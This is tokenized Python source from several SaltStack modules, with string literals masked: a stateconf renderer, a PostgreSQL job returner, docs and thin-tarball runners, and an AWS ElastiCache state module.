<EOL> with salt . utils . fopen ( input , '<STR_LIT:r>' ) as ifile : <EOL> sls_templ = ifile . read ( ) <EOL> else : <EOL> sls_templ = input . read ( ) <EOL> match = re . search ( __opts__ [ '<STR_LIT>' ] , sls_templ ) <EOL> if match : <EOL> process_sls_data ( sls_templ [ : match . start ( ) ] , extract = True ) <EOL> if STATE_CONF : <EOL> tmplctx = STATE_CONF . copy ( ) <EOL> if tmplctx : <EOL> prefix = sls + '<STR_LIT>' <EOL> for k in six . iterkeys ( tmplctx ) : <EOL> if k . startswith ( prefix ) : <EOL> tmplctx [ k [ len ( prefix ) : ] ] = tmplctx [ k ] <EOL> del tmplctx [ k ] <EOL> else : <EOL> tmplctx = { } <EOL> data = process_sls_data ( sls_templ , tmplctx ) <EOL> if log . isEnabledFor ( logging . DEBUG ) : <EOL> import pprint <EOL> log . debug ( '<STR_LIT>' . format ( pprint . pformat ( data ) ) ) <EOL> return data <EOL> def has_names_decls ( data ) : <EOL> for sid , _ , _ , args in statelist ( data ) : <EOL> if sid == '<STR_LIT>' : <EOL> continue <EOL> for _ in nvlist ( args , [ '<STR_LIT>' ] ) : <EOL> return sid <EOL> def rewrite_single_shorthand_state_decl ( data ) : <EOL> '''<STR_LIT>''' <EOL> for sid , states in six . iteritems ( data ) : <EOL> if isinstance ( states , six . string_types ) : <EOL> data [ sid ] = { states : [ ] } <EOL> def rewrite_sls_includes_excludes ( data , sls , saltenv ) : <EOL> for sid in data : <EOL> if sid == '<STR_LIT>' : <EOL> includes = data [ sid ] <EOL> for i , each in enumerate ( includes ) : <EOL> if isinstance ( each , dict ) : <EOL> slsenv , incl = each . popitem ( ) <EOL> else : <EOL> slsenv = saltenv <EOL> incl = each <EOL> if incl . startswith ( '<STR_LIT:.>' ) : <EOL> includes [ i ] = { slsenv : _relative_to_abs_sls ( incl , sls ) } <EOL> elif sid == '<STR_LIT>' : <EOL> for sdata in data [ sid ] : <EOL> if '<STR_LIT>' in sdata and sdata [ '<STR_LIT>' ] . startswith ( '<STR_LIT:.>' ) : <EOL> sdata [ '<STR_LIT>' ] = _relative_to_abs_sls ( sdata [ '<STR_LIT>' ] , sls ) <EOL> def _local_to_abs_sid ( sid , sls ) : <EOL> if '<STR_LIT>' in sid : <EOL> return _relative_to_abs_sls ( sid , sls ) <EOL> else : <EOL> abs_sls = _relative_to_abs_sls ( sid , sls + '<STR_LIT:.>' ) <EOL> return '<STR_LIT>' . join ( abs_sls . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) ) <EOL> def _relative_to_abs_sls ( relative , sls ) : <EOL> '''<STR_LIT>''' <EOL> levels , suffix = re . match ( r'<STR_LIT>' , relative ) . groups ( ) <EOL> level_count = len ( levels ) <EOL> p_comps = sls . split ( '<STR_LIT:.>' ) <EOL> if level_count > len ( p_comps ) : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> return '<STR_LIT:.>' . join ( p_comps [ : - level_count ] + [ suffix ] ) <EOL> def nvlist ( thelist , names = None ) : <EOL> '''<STR_LIT>''' <EOL> for nvitem in thelist : <EOL> if isinstance ( nvitem , dict ) : <EOL> name , value = next ( six . iteritems ( nvitem ) ) <EOL> if names is None or name in names : <EOL> yield nvitem , name , value <EOL> def nvlist2 ( thelist , names = None ) : <EOL> '''<STR_LIT>''' <EOL> for _ , _ , value in nvlist ( thelist , names ) : <EOL> for each in nvlist ( value ) : <EOL> yield each <EOL> def statelist ( states_dict , sid_excludes = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> for sid , states in six . iteritems ( states_dict ) : <EOL> if sid . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if sid in sid_excludes : <EOL> continue <EOL> for sname , args in six . iteritems ( states ) : <EOL> if sname . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> yield sid , states , sname , args <EOL> REQUISITES = set ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] ) <EOL> def rename_state_ids ( data , sls , is_extend = False ) : <EOL> if '<STR_LIT>' in data and not is_extend : <EOL> rename_state_ids ( data [ '<STR_LIT>' ] , sls , True ) <EOL> for sid , _ , _ , args in statelist ( data ) : <EOL> for req , sname , sid in nvlist2 ( args , REQUISITES ) : <EOL> if sid . startswith ( '<STR_LIT:.>' ) : <EOL> req [ sname ] = _local_to_abs_sid ( sid , sls ) <EOL> for sid in data : <EOL> if sid . startswith ( '<STR_LIT:.>' ) : <EOL> newsid = _local_to_abs_sid ( sid , sls ) <EOL> if newsid in data : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( sid , newsid ) <EOL> ) <EOL> for sname , args in six . iteritems ( data [ sid ] ) : <EOL> if state_name ( sname ) == STATE_NAME : <EOL> continue <EOL> for arg in args : <EOL> if isinstance ( arg , dict ) and next ( iter ( arg ) ) == '<STR_LIT:name>' : <EOL> break <EOL> else : <EOL> args . insert ( <NUM_LIT:0> , dict ( name = sid [ <NUM_LIT:1> : ] ) ) <EOL> data [ newsid ] = data [ sid ] <EOL> del data [ sid ] <EOL> REQUIRE = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> REQUIRE_IN = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> EXTENDED_REQUIRE = { } <EOL> EXTENDED_REQUIRE_IN = { } <EOL> from itertools import chain <EOL> def add_implicit_requires ( data ) : <EOL> def T ( sid , state ) : <EOL> return '<STR_LIT>' . format ( sid , state_name ( state ) ) <EOL> states_before = set ( ) <EOL> states_after = set ( ) <EOL> for sid in data : <EOL> for state in data [ sid ] : <EOL> states_after . add ( T ( sid , state ) ) <EOL> prev_state = ( None , None ) <EOL> for sid , states , sname , args in statelist ( data ) : <EOL> if sid == '<STR_LIT>' : <EOL> for esid , _ , _ , eargs in statelist ( states ) : <EOL> for _ , rstate , rsid in nvlist2 ( eargs , REQUIRE ) : <EOL> EXTENDED_REQUIRE . setdefault ( <EOL> T ( esid , rstate ) , [ ] ) . append ( ( None , rstate , rsid ) ) <EOL> for _ , rstate , rsid in nvlist2 ( eargs , REQUIRE_IN ) : <EOL> EXTENDED_REQUIRE_IN . setdefault ( <EOL> T ( esid , rstate ) , [ ] ) . append ( ( None , rstate , rsid ) ) <EOL> continue <EOL> tag = T ( sid , sname ) <EOL> states_after . remove ( tag ) <EOL> reqs = nvlist2 ( args , REQUIRE ) <EOL> if tag in EXTENDED_REQUIRE : <EOL> reqs = chain ( reqs , EXTENDED_REQUIRE [ tag ] ) <EOL> for _ , rstate , rsid in reqs : <EOL> if T ( rsid , rstate ) in states_after : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( tag , T ( rsid , rstate ) ) <EOL> ) <EOL> reqs = nvlist2 ( args , REQUIRE_IN ) <EOL> if tag in EXTENDED_REQUIRE_IN : <EOL> reqs = chain ( reqs , EXTENDED_REQUIRE_IN [ tag ] ) <EOL> for _ , rstate , rsid in reqs : <EOL> if T ( rsid , rstate ) in states_before : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( tag , T ( rsid , rstate ) ) <EOL> ) <EOL> if prev_state [ <NUM_LIT:0> ] is not None : <EOL> try : <EOL> next ( nvlist ( args , [ '<STR_LIT>' ] ) ) [ <NUM_LIT:2> ] . insert ( <NUM_LIT:0> , dict ( [ prev_state ] ) ) <EOL> except StopIteration : <EOL> args . append ( dict ( require = [ dict ( [ prev_state ] ) ] ) ) <EOL> states_before . add ( tag ) <EOL> prev_state = ( state_name ( sname ) , sid ) <EOL> def add_start_state ( data , sls ) : <EOL> start_sid = __opts__ [ '<STR_LIT>' ] <EOL> if start_sid in data : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( start_sid ) <EOL> ) <EOL> if not data : <EOL> return <EOL> non_sids = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> for sid , states in six . iteritems ( data ) : <EOL> if sid in non_sids or sid . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if '<STR_LIT>' not in states or states [ '<STR_LIT>' ] == sls : <EOL> break <EOL> else : <EOL> raise SaltRenderError ( '<STR_LIT>' ) <EOL> reqin = { state_name ( next ( six . iterkeys ( data [ sid ] ) ) ) : sid } <EOL> data [ start_sid ] = { STATE_FUNC : [ { '<STR_LIT>' : [ reqin ] } ] } <EOL> def add_goal_state ( data ) : <EOL> goal_sid = __opts__ [ '<STR_LIT>' ] <EOL> if goal_sid in data : <EOL> raise SaltRenderError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( goal_sid ) <EOL> ) <EOL> else : <EOL> reqlist = [ ] <EOL> for sid , states , state , _ in statelist ( data , set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) : <EOL> if '<STR_LIT>' in states : <EOL> continue <EOL> reqlist . append ( { state_name ( state ) : sid } ) <EOL> data [ goal_sid ] = { STATE_FUNC : [ dict ( require = reqlist ) ] } <EOL> def state_name ( sname ) : <EOL> '''<STR_LIT>''' <EOL> return sname . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> class Bunch ( dict ) : <EOL> def __getattr__ ( self , name ) : <EOL> return self [ name ] <EOL> STATE_CONF = { } <EOL> STATE_CONF_EXT = { } <EOL> def extract_state_confs ( data , is_extend = False ) : <EOL> for state_id , state_dict in six . iteritems ( data ) : <EOL> if state_id == '<STR_LIT>' and not is_extend : <EOL> extract_state_confs ( state_dict , True ) <EOL> continue <EOL> if STATE_NAME in state_dict : <EOL> key = STATE_NAME <EOL> elif STATE_FUNC in state_dict : <EOL> key = STATE_FUNC <EOL> else : <EOL> continue <EOL> to_dict = STATE_CONF_EXT if is_extend else STATE_CONF <EOL> conf = to_dict . setdefault ( state_id , Bunch ( ) ) <EOL> for sdk in state_dict [ key ] : <EOL> if not isinstance ( sdk , dict ) : <EOL> continue <EOL> key , val = next ( six . iteritems ( sdk ) ) <EOL> conf [ key ] = val <EOL> if not is_extend and state_id in STATE_CONF_EXT : <EOL> extend = STATE_CONF_EXT [ state_id ] <EOL> for requisite in '<STR_LIT>' , '<STR_LIT>' : <EOL> if requisite in extend : <EOL> extend [ requisite ] += to_dict [ state_id ] . get ( requisite , [ ] ) <EOL> to_dict [ state_id ] . update ( STATE_CONF_EXT [ state_id ] ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import json <EOL> import logging <EOL> import re <EOL> import sys <EOL> import salt . utils <EOL> import salt . utils . jid <EOL> import salt . ext . six as six <EOL> try : <EOL> import psycopg2 <EOL> HAS_POSTGRES = True <EOL> except ImportError : <EOL> HAS_POSTGRES = False <EOL> log = logging . getLogger ( __name__ ) <EOL> LOAD_P = '<STR_LIT>' <EOL> MINIONS_P = '<STR_LIT>' <EOL> RETURN_P = '<STR_LIT>' <EOL> OUT_P = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> if not HAS_POSTGRES : <EOL> log . info ( "<STR_LIT>" ) <EOL> return False <EOL> return '<STR_LIT>' <EOL> def _get_conn ( ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> conn = psycopg2 . connect ( <EOL> host = __opts__ [ '<STR_LIT>' ] , <EOL> user = __opts__ [ '<STR_LIT>' ] , <EOL> password = __opts__ [ '<STR_LIT>' ] , <EOL> database = __opts__ [ '<STR_LIT>' ] , <EOL> port = __opts__ [ '<STR_LIT>' ] ) <EOL> except psycopg2 . OperationalError : <EOL> log . error ( "<STR_LIT>" + str ( sys . exc_info ( ) [ <NUM_LIT:0> ] ) ) <EOL> return None <EOL> return conn <EOL> def _close_conn ( conn ) : <EOL> '''<STR_LIT>''' <EOL> conn . commit ( ) <EOL> conn . close ( ) <EOL> def _format_job_instance ( job ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT>' : job . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : json . loads ( job . get ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : job . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : job . get ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : job . get ( '<STR_LIT:user>' , '<STR_LIT:root>' ) } <EOL> return ret <EOL> def _format_jid_instance ( jid , job ) : <EOL> '''<STR_LIT>''' <EOL> ret = _format_job_instance ( job ) <EOL> ret . update ( { '<STR_LIT>' : salt . utils . jid . jid_to_time ( jid ) } ) <EOL> return ret <EOL> def _gen_jid ( cur ) : <EOL> '''<STR_LIT>''' <EOL> jid = salt . utils . jid . gen_jid ( ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . execute ( sql , ( jid , ) ) <EOL> data = cur . fetchall ( ) <EOL> if not data : <EOL> return jid <EOL> return None <EOL> def prep_jid ( nocache = False , passed_jid = None ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> if passed_jid is None : <EOL> jid = _gen_jid ( cur ) <EOL> else : <EOL> jid = passed_jid <EOL> while not jid : <EOL> log . info ( "<STR_LIT>" ) <EOL> jid = _gen_jid ( cur ) <EOL> cur . close ( ) <EOL> conn . close ( ) <EOL> return jid <EOL> def returner ( load ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . execute ( <EOL> sql , ( <EOL> load [ '<STR_LIT>' ] , <EOL> load [ '<STR_LIT>' ] , <EOL> json . dumps ( six . text_type ( str ( load [ '<STR_LIT>' ] ) , '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) ) , <EOL> load [ '<STR_LIT:id>' ] , <EOL> load . get ( '<STR_LIT:success>' ) , <EOL> ) <EOL> ) <EOL> _close_conn ( conn ) <EOL> def event_return ( events ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> for event in events : <EOL> tag = event . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data = event . get ( '<STR_LIT:data>' , '<STR_LIT>' ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . execute ( sql , ( tag , json . dumps ( data ) , __opts__ [ '<STR_LIT:id>' ] ) ) <EOL> _close_conn ( conn ) <EOL> def save_load ( jid , clear_load ) : <EOL> '''<STR_LIT>''' <EOL> jid = _escape_jid ( jid ) <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' <EOL> cur . execute ( <EOL> sql , ( <EOL> jid , <EOL> salt . utils . jid . jid_to_time ( jid ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> str ( clear_load . get ( "<STR_LIT:user>" ) ) , <EOL> str ( json . dumps ( clear_load . get ( "<STR_LIT>" ) ) ) , <EOL> str ( clear_load . get ( "<STR_LIT>" ) ) , <EOL> ) <EOL> ) <EOL> _close_conn ( conn ) <EOL> def save_minions ( jid , minions ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> def _escape_jid ( jid ) : <EOL> '''<STR_LIT>''' <EOL> jid = str ( jid ) <EOL> jid = re . sub ( r"<STR_LIT>" , "<STR_LIT>" , jid ) <EOL> return jid <EOL> def _build_dict ( data ) : <EOL> '''<STR_LIT>''' <EOL> result = { } <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:0> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:1> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:2> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:3> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:4> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:5> ] <EOL> result [ "<STR_LIT:user>" ] = data [ <NUM_LIT:6> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:7> ] <EOL> result [ "<STR_LIT>" ] = data [ <NUM_LIT:8> ] <EOL> return result <EOL> def get_load ( jid ) : <EOL> '''<STR_LIT>''' <EOL> jid = _escape_jid ( jid ) <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' '''<STR_LIT>''' <EOL> cur . execute ( sql , ( jid , ) ) <EOL> data = cur . fetchone ( ) <EOL> if data : <EOL> return _build_dict ( data ) <EOL> _close_conn ( conn ) <EOL> return { } <EOL> def get_jid ( jid ) : <EOL> '''<STR_LIT>''' <EOL> jid = _escape_jid ( jid ) <EOL> conn = _get_conn ( ) <EOL> if conn is None : <EOL> return None <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' <EOL> cur . execute ( sql , ( jid , ) ) <EOL> data = cur . fetchall ( ) <EOL> ret = { } <EOL> if data : <EOL> for minion , full_ret in data : <EOL> ret [ minion ] = { } <EOL> ret [ minion ] [ '<STR_LIT>' ] = json . loads ( full_ret ) <EOL> _close_conn ( conn ) <EOL> return ret <EOL> def get_jids ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = _get_conn ( ) <EOL> cur = conn . cursor ( ) <EOL> sql = '''<STR_LIT>''' '''<STR_LIT>''' '''<STR_LIT>''' <EOL> if __opts__ [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> sql = sql + "<STR_LIT>" + str ( __opts__ [ '<STR_LIT>' ] ) + "<STR_LIT>" <EOL> cur . execute ( sql ) <EOL> ret = { } <EOL> data = cur . fetchone ( ) <EOL> while data : <EOL> data_dict = _build_dict ( data ) <EOL> ret [ data_dict [ "<STR_LIT>" ] ] = _format_jid_instance ( data_dict [ "<STR_LIT>" ] , data_dict ) <EOL> data = cur . fetchone ( ) <EOL> cur . close ( ) <EOL> conn . close ( ) <EOL> return ret <EOL> def clean_old_jobs ( ) : <EOL> '''<STR_LIT>''' <EOL> return </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import , print_function <EOL> import itertools <EOL> import salt . client <EOL> import salt . runner <EOL> import salt . wheel <EOL> import salt . ext . six as six <EOL> from salt . exceptions import SaltClientError <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def runner ( ) : <EOL> '''<STR_LIT>''' <EOL> client = salt . runner . RunnerClient ( __opts__ ) <EOL> ret = client . get_docs ( ) <EOL> return ret <EOL> def wheel ( ) : <EOL> '''<STR_LIT>''' <EOL> client = salt . wheel . Wheel ( __opts__ ) <EOL> ret = client . get_docs ( ) <EOL> return ret <EOL> def execution ( ) : <EOL> '''<STR_LIT>''' <EOL> client = salt . client . get_local_client ( __opts__ [ '<STR_LIT>' ] ) <EOL> docs = { } <EOL> try : <EOL> for ret in client . cmd_iter ( '<STR_LIT:*>' , '<STR_LIT>' , timeout = __opts__ [ '<STR_LIT>' ] ) : <EOL> for v in six . itervalues ( ret ) : <EOL> docs . update ( v ) <EOL> except SaltClientError as exc : <EOL> print ( exc ) <EOL> return [ ] <EOL> i = itertools . chain . from_iterable ( [ six . iteritems ( docs [ '<STR_LIT>' ] ) ] ) <EOL> ret = dict ( list ( i ) ) <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> import salt . utils . thin <EOL> def generate ( extra_mods = '<STR_LIT>' , overwrite = False , so_mods = '<STR_LIT>' , <EOL> python2_bin = '<STR_LIT>' , python3_bin = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . thin . gen_thin ( __opts__ [ '<STR_LIT>' ] , <EOL> extra_mods , <EOL> overwrite , <EOL> so_mods , <EOL> python2_bin , <EOL> python3_bin ) <EOL> def generate_min ( extra_mods = '<STR_LIT>' , overwrite = False , so_mods = '<STR_LIT>' , <EOL> python2_bin = '<STR_LIT>' , python3_bin = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> return salt . utils . thin . gen_min ( __opts__ [ '<STR_LIT>' ] , <EOL> extra_mods , <EOL> overwrite , <EOL> so_mods , <EOL> python2_bin , <EOL> python3_bin ) </s>
<s> '''<STR_LIT>''' </s>
<s> '''<STR_LIT>''' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in __salt__ : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return False <EOL> def present ( <EOL> name , <EOL> engine = None , <EOL> cache_node_type = None , <EOL> num_cache_nodes = None , <EOL> preferred_availability_zone = None , <EOL> port = None , <EOL> cache_parameter_group_name = None , <EOL> cache_security_group_names = None , <EOL> replication_group_id = None , <EOL> auto_minor_version_upgrade = True , <EOL> security_group_ids = None , <EOL> cache_subnet_group_name = None , <EOL> engine_version = None , <EOL> notification_topic_arn = None , <EOL> preferred_maintenance_window = None , <EOL> wait = None , <EOL> region = None , <EOL> key = None , <EOL> keyid = None , <EOL> profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , '<STR_LIT:result>' : True , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { } } <EOL> if cache_security_group_names and cache_subnet_group_name : <EOL> _subnet_group = __salt__ [ '<STR_LIT>' ] ( <EOL> cache_subnet_group_name , region , key , keyid , profile <EOL> ) <EOL> vpc_id = _subnet_group [ '<STR_LIT>' ] <EOL> if not security_group_ids : <EOL> security_group_ids = [ ] <EOL> _security_group_ids = __salt__ [ '<STR_LIT>' ] ( <EOL> cache_security_group_names , vpc_id , region , key , keyid , profile <EOL> ) <EOL> security_group_ids . extend ( _security_group_ids ) <EOL> cache_security_group_names = None <EOL> config = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , <EOL> profile ) <EOL> if config is None : <EOL> msg = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = msg <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> elif not config : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> msg = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT>' ] = msg <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> created = __salt__ [ '<STR_LIT>' ] ( <EOL> name = name , num_cache_nodes = num_cache_nodes , <EOL> cache_node_type = cache_node_type , engine = engine , <EOL> replication_group_id = replication_group_id , <EOL> engine_version = engine_version , <EOL> cache_parameter_group_name = cache_parameter_group_name , <EOL> cache_subnet_group_name = cache_subnet_group_name , <EOL> cache_security_group_names = cache_security_group_names , <EOL> security_group_ids = security_group_ids , <EOL> preferred_availability_zone = preferred_availability_zone , <EOL> preferred_maintenance_window = preferred_maintenance_window , <EOL> port = port , notification_topic_arn = notification_topic_arn , <EOL> auto_minor_version_upgrade = auto_minor_version_upgrade , <EOL> wait = wait , region = region , key = key , keyid = keyid , profile = profile ) <EOL> if created : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> config = __salt__ [ '<STR_LIT>' ] ( name , region , key , <EOL> keyid , profile ) <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = config <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> def subnet_group_present ( name , subnet_ids , description , tags = None , region = None , <EOL> key = None , keyid = None , profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> exists = __salt__ [ '<STR_LIT>' ] ( name = name , tags = tags , region = region , key = key , <EOL> keyid = keyid , profile = profile ) <EOL> if not exists : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> created = __salt__ [ '<STR_LIT>' ] ( name = name , subnet_ids = subnet_ids , <EOL> description = description , tags = tags , <EOL> region = region , key = key , keyid = keyid , <EOL> profile = profile ) <EOL> if not created : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = name <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return ret <EOL> def absent ( name , wait = True , region = None , key = None , keyid = None , profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , '<STR_LIT:result>' : True , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { } } <EOL> is_present = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , profile ) <EOL> if is_present : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> deleted = __salt__ [ '<STR_LIT>' ] ( name , wait , region , key , <EOL> keyid , profile ) <EOL> if deleted : <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = name <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name , region ) <EOL> return ret <EOL> def creategroup ( name , primary_cluster_id , replication_group_description , wait = None , <EOL> region = None , key = None , keyid = None , profile = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:name>' : name , '<STR_LIT:result>' : None , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : { } } <EOL> is_present = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , <EOL> profile ) <EOL> if not is_present : <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( <EOL> name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> created = __salt__ [ '<STR_LIT>' ] ( name , primary_cluster_id , <EOL> replication_group_description , <EOL> wait , region , key , keyid , profile ) <EOL> if created : <EOL> config = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , profile ) <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = config <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> else : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> return ret <EOL> def subnet_group_absent ( name , tags = None , region = None , key = None , keyid = None , profile = None ) : <EOL> ret = { '<STR_LIT:name>' : name , <EOL> '<STR_LIT:result>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> exists = __salt__ [ '<STR_LIT>' ] ( name = name , tags = tags , region = region , key = key , <EOL> keyid = keyid , profile = profile ) <EOL> if not exists : <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> if __opts__ [ '<STR_LIT:test>' ] : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> ret [ '<STR_LIT:result>' ] = None <EOL> return ret <EOL> deleted = __salt__ [ '<STR_LIT>' ] ( name , region , key , keyid , profile ) <EOL> if not deleted : <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = name <EOL> ret [ '<STR_LIT>' ] [ '<STR_LIT>' ] = None <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( name ) <EOL> return ret </s>
